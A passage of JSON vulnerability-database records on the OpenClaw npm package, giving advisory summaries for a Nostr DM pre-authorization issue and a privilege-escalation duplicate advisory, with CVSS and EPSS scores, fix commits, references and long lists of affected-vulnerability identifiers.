                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35633",
                "GHSA-4qwc-c7g9-4xcw"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-816s-45wb-83ce"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90791?format=api",
            "vulnerability_id": "VCID-849r-t5j1-vue8",
            "summary": "OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n## Summary\nNostr inbound DM handling could perform cryptographic and dispatch work before sender and pairing policy enforcement, so a sender who had not been authorized could trigger that computation before any authorization check.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `1ee9611079e81b9122f4bed01abb3d9f56206c77`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- `extensions/nostr/src/channel.ts` now performs authorization before decrypting and dispatching inbound DM content.\n- `extensions/nostr/src/nostr-bus.ts` adds pre-crypto authorization, size, and rate guardrails before expensive decrypt work.\n\nOpenClaw thanks @kuranikaran for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35627",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00122",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30889",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00122",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30923",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00122",
                            "scoring_system": "epss",
                            "scoring_elements": "0.30955",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35627"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-65h8-27jh-q8wv",
                    "reference_id": "GHSA-65h8-27jh-q8wv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-65h8-27jh-q8wv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35627",
                "GHSA-65h8-27jh-q8wv"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-849r-t5j1-vue8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89605?format=api",
            "vulnerability_id": "VCID-8aek-6dw1-tudj",
            "summary": "Duplicate Advisory: OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hf68-49fm-59cq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. An attacker who holds the operator.pairing scope can exploit this insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
